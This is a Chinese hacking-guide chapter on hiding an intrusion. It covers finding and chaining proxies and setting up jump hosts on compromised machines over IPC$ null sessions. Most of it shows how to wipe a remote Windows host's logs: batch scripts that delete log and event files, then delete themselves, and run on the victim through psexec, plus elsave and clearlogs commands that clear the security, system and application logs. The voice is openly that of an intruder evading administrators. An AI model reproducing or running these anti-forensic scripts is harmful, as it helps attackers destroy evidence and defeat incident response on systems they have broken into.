七：如何实现代理与日志清除技术

在找到远程主机/服务器的系统漏洞之后，入侵者往往会对其进行试探性的入侵。此时为了避免被经验丰富的网络安全专家发现，入侵者会在入侵时使用各种方法隐藏自己，尽量不去直接与目标主机接触，以免直接暴露给远程主机/服务器。在隐藏自己的各种手段中，使用代理服务器和跳板技术是最为常见的一种。

主要内容：

·代理服务器软件的使用

·日志文件的清除

7.1　代理服务器软件的使用

代理服务器可用于局域网计算机与Internet连接时共享上网，而黑客则可通过代理服务器软件对某台计算机进行扫描，从而截获目标计算机的重要信息，以达到入侵的目的。

7.1.1　利用代理猎手找代理

代理猎手是一款集搜索与验证于一身的软件，可以快速查找网络上的免费Proxy。其主要特点为：支持多网址段、多端口自动查询；支持自动验证并给出速度评价；支持后续的时间预测；支持用户设置最大连接数（可以做到不影响其他网络程序）并运行自动查找最新版本。其最大的特点是搜索速度快，最快可以在十几分钟搜完整个B类地址的65536个地址。

代理猎手可以通过百度、雅虎、新浪等搜索引擎查找代理猎手下载链接进行下载。

1.添加搜索任务

在代理猎手安装完毕后，还需要添加相应的搜索任务，具体的操作步骤如下。

STEP01：启动“代理猎手”

STEP02：添加搜索任务

STEP03：地址范围设置

STEP04：添加搜索IP范围

STEP05：IP地址范围添加成功

STEP06：进入“已定义的IP地址范围”对话框

STEP07：添加搜索IP地址范围

STEP08：查看已定义的IP地址范围

STEP09：读入地址范围

STEP10：返回“已定义的IP地址范围”对话框

STEP11：返回“地址范围”对话框

STEP12：打开“端口和协议”对话框

STEP13：添加端口和协议

STEP14：返回“端口和协议”对话框

2.设置参数

在设置好搜索的IP地址范围后，就可以开始进行搜索，但为了提高搜索效率，还有必要先设置一下代理猎手的各项参数。具体的操作步骤如下。

STEP01：打开“代理猎手”窗口

STEP02：运行参数设置

小技巧

代理猎手默认的搜索、验证和Ping的并发数量分别为50、80和100，如果用户的带宽无法达到，就最好相应地减少各个并发数量，以减轻网络的负担。

STEP03：验证数据设置

STEP04：代理调度设置

STEP05：其他设置

STEP06：返回主界面

3.查看搜索结果

在搜索完毕后，就可以查看搜索的结果，具体的操作步骤如下。

STEP01：查看搜索结果

“验证状态”为Free的代理，即为可以使用的代理服务器。

STEP02：查看代理调度

找到可用的代理服务器之后，右键单击该代理，通过快捷菜单将选定的代理加入到调度中。这样代理猎手就可以自动为服务器进行调度了，多增加几个代理服务器有利于网络速度的提高。

提示

一般情况下，验证状态为Free的代理服务器很少，但只要验证状态为“Good”就可以使用了。

小技巧

用户也可以将搜索到的可用代理服务器IP地址和端口输入到网页浏览器的代理服务器设置选项中，这样，用户就可以通过该代理服务器进行网上冲浪。

7.1.2　用SocksCap32设置动态代理

SocksCap32代理软件是一款基于Socks协议的网络代理客户端软件，它能将指定软件的任何Winsock调用转换成Socks协议的请求，并发送给指定的Socks代理服务器。可用于使基于HTTP、FTP、Telnet等协议的软件，通过Socks代理服务器连接到目的地。

使用SocksCap32软件前，需要先有一个Socks的代理服务器（不管是用代理猎手找出来的，还是从各个代理网站中得到的，就是要有一个）。目前，SocksCap32软件可以通过搜索引擎找到其下载地址，并将其下载到本地磁盘中。

1.建立应用程度标识

当第一次运行SocksCap32程序时，将显示“SocksCap许可”对话框。在单击“接受”按钮接受许可协议内容后，才能进入SocksCap32的主窗口，如下图所示。

“SocksCap许可”对话框

建立应用程序标识的具体操作步骤如下。

STEP01：打开SocksCap32主窗口

STEP02：新建应用程序标识项

STEP03：选择需要代理的应用程序

STEP04：返回主窗口

提示

添加的应用程序可以是E-mail工具、FTP工具、Telnet工具，以及当今最热门的联网游戏等。

2.设置选项

设置SocksCap32选项的具体操作步骤如下。

STEP01：打开SocksCap32的主窗口

STEP02：SocksCap设置

在“Socks设置”选项卡中对服务器以及协议进行设置。

提示

如果用户查找的代理服务器需要用户名和密码，且已获得该用户名和密码，则可勾选“用户名/密码”复选框。若勾选“用户名/密码”复选框，则单击“确定”按钮后，需要在“用户名/密码验证”对话框中输入用户名和密码，如下图所示。

STEP03：添加直接连接的IP地址等

STEP04：设置直接连接的应用程序和库

STEP05：设置日志信息

在设置好代理选项并添加好代理应用程序后，在应用程序列表中选取需运行的应用程序，单击“文件”>“通过Socks代理运行”菜单项，即可启动该应用程序并通过代理进行登录。如果需要使某个应用程序通过SocksCap32代理，则必须通过SocksCap32启动。

7.1.3　防范远程跳板代理攻击

一些黑客技术本身，初一接手时还感觉不到它的妙处，越是使用得久，越能在不经意间发现其奥妙，远程跳板代理攻击模式即为这样的一种技术。

1.扫描选择目标

这里使用的工具是国内享有盛誉的流光软件，主要理由是它所特有的一种扫描模式：远程扫描模式。通过在对远程肉鸡上的安装，就可以轻易实现扫描远程的跳板式扫描。具体操作步骤如下。

STEP01：运行“Fluxay”软件

STEP02：主机扫描设置

STEP03：开始扫描目标主机

STEP04：查看扫描结果

STEP05：返回主窗口

STEP06：IPC自动探测

STEP07：返回主界面

查看在目标主机下探测到的用户。

2.代理跳板的架设

代理架设的方法很简单，具体的操作步骤如下。

首先，通过3389远程登录自己的肉机，选择“开始”，在搜索文本框中输入cmd，即可进入“命令提示符”窗口。

然后在当前命令提示符下输入“net use\\192.168.0.55""/user:"Administrator"”命令，即可建立空连接。稍等片刻，就会显示“命令执行成功”信息。

7.2　日志文件的清除

日志文件记录了用户在系统中进行的所有操作，如系统中出现的错误、安全等问题，这样日积月累下来，逐渐加重了服务器的负荷。对于黑客而言，这个记录了入侵踪迹的文件更应该及时清除掉，以免被管理员抓住“小尾巴”。

7.2.1　手工清除服务器日志

在入侵过程中，远程主机的Windows系统会对入侵者的登录、注销、连接、甚至复制文件等操作进行记录，并把这些记录保留在日志中。在日志文件中记录着入侵者登录时所有的账号以及入侵者的IP地址等信息。入侵者通过多种途径来擦除留下的痕迹，往往是在远程被控主机的“控制面板”窗口中打开事件记录窗口，在其中对服务器日志进行手工清除。具体的操作步骤如下。

STEP01：IPC$成功连接

STEP02：打开“系统和安全”窗口

STEP03：查看各种工具

STEP04：打开“计算机管理”窗口

STEP05：查看事件类型

STEP06：查看事件实例

STEP07：查看事件具体信息

STEP08：删除事件

7.2.2　使用批处理清除远程主机日志

一般情况下，在Windows系统中，日志文件的扩展名为log、txt，这样就可以编写一个批处理文件来实现对日志文件的清除。具体的实现步骤如下。

STEP01：编写一个批处理文件del.bat，代码如下。

---

@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat 

---

提示

在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令是删除文件命令。

STEP02：再新建一个批处理文件clean.bat，其具体内容如下。

---

@copy del.bat ＼%1c$ @echo 向肉鸡复制本机的del.bat……OK @psexec ＼%1 c:del.bat @echo 在肉鸡上运行del.bat，清除日志文件……OK 

---

STEP03：假设已经与肉鸡进行了IPC$连接，则只要在MS-DOS命令提示符窗口中输入“clean.bat肉鸡IP”命令，就可以清除肉鸡上的日志文件。

7.2.3　使用清理工具清除日志

日志文件记录了用户在系统中进行的所有操作，如系统中出现的错误、安全等问题，这样日积月累下来，逐渐加重了服务器的负荷。对于黑客而言，这个记录了入侵踪迹的文件更应该及时清除掉，以免被管理员抓住了“小尾巴”。此时，黑客就会借助一些工具来清除日志。常用的工具是：elsave和CleanIISLog。这样，就使清除日志工作变得更为简单和快捷。

1.利用elsave清除日志

elsave是一款由小榕制作的清除日志工具，使用此工具不仅可以清除本地计算机的日志，还可以远程删除“事件查看器”中的相关的日志。

命令格式为elsave[-s\\server][-l log][-F file][-C][-q]，其中各个参数的含义如下。

·-s\\server：指定远程计算机。

·-l log：指定日志类型、其中“application”为应用程序日志；参数“system”为系统日志；参数“security”为安全日志。

·-F file：指定保存日志文件的路径。

·-C：清除日志操作，注意“C”为大写。

·-q：把错误信息写入日志。

使用elsave.exe删除远程主机中日志的具体操作步骤如下。

STEP01：打开E盘根目录

将“elsave.exe”粘贴至E盘根目录。

STEP02：打开本地“命令提示符”窗口

输入“net use\\192.168.0.7\ipc$/user:administrator”命令会出现“输入密码”提示信息。输入远程主机的密码后，即可与远程主机/服务器进行连接用IPC$连接。

STEP03：删除远程计算机中的应用程序日志

输入e:，按“Enter”键切换至E盘跟目录。然后输入“elsave–s\\192.168.0.7–l"application"–C”命令即可。

STEP04：删除该远程主机中的系统日志

输入命令“elsave–s\\192.168.0.7–l"system"–C”，即可将其删除。

STEP05：清除远程主机的安全日志

输入“elsave–s\\192.168.0.7–l"security"–C”命令即可。在输入命令时要注意命令的最后一个参数C，该参数一定要大写，否则命令在运行时就会出错。

STEP06：在本地“命令提示符”窗口中输入“net use\\192.168.0.7\ipc$/del”命令，即可断开IPC$连接。这样，黑客便成功地删除了远程主机中的事件日志。

STEP07：也可以编写一个批处理文件clear.bat，具体内容如下。

---

net use \\%1\ipc$ %3 /user:%2elsave -s \\%1 -l "application" -Celsave -s \\%1 -l "system" -Celsave -s \\%1 -l "securtity" -Cnet use \\%1\ipc$ /del

---

STEP08：把该文件存储到和Elsave.exe文件相同的文件夹下，在“命令提示符”窗口中运行“Clear.bat 192.168.0.7Adminstrator"037971"”命令，即可清除远程计算机的日志记录。

2.利用ClearLog工具清除日志

若想清理系统、安全与程序日志，也可利用ClearLog工具。由于该程序可直接进行远程清理，不需要将此程序上传到目标服务器中运行，利用它可以清理Windows的一般日志，包括系统日志（System Log）、安全日志（Security Log）与程序运行日志（Applications Log）。clearlogs的命令格式为：clearlogs[\\computername]<-app/-sec/-sys>。

-app=应用程序日志

-sec=安全日志

-sys=系统日志

下面以清除192.168.0.16机子上的事件日志为例进行介绍，具体的操作步骤如下。

STEP01：用IPC$连接把clearlogs上传到远程计算机。在MS-DOS命令提示符窗口中输入命令“net use\\192.168.0.16\ipc$""/Susan”。

STEP02：清除远程主机上的日志。再通过“net time”命令查看远程计算机的系统时间，再用AT命令建立一个计划任务来执行clearlogs.exe文件：AT时间c:\clear.bat。

---

clearlogs \\192.168.0.16 -app      清除远程计算机的应用程序日志clearlogs \\192.168.0.16 -sec      清除远程计算机的安全日志clearlogs \\192.168.0.16-sys       清除远程计算机的系统日志

---

或者为了更安全一点，也可以建立一个批处理文件clear.bat。

---

@echo offclearlogs -appclearlogs -secclearlogs -sysdel clearlogs.exedel c.batexit

---

STEP03：断开IPC$连接。使用命令“net use\\192.168.0.16\ipc$/del”，经过上述操作之后，远程主机中的日志记录就可以被清除了。

通过执行上述命令，即可轻松将自己入侵的日志清除干净，不必一个个去辛苦查找各项日志文件的存放位置后再清除，这两个小工具会自动帮助用户完成这些烦琐的事情。但此工具只能删除默认文件夹中的日志文件，如果目标服务器的网管将日志文件位置改到其他文件夹中，使用这个工具就不能清除。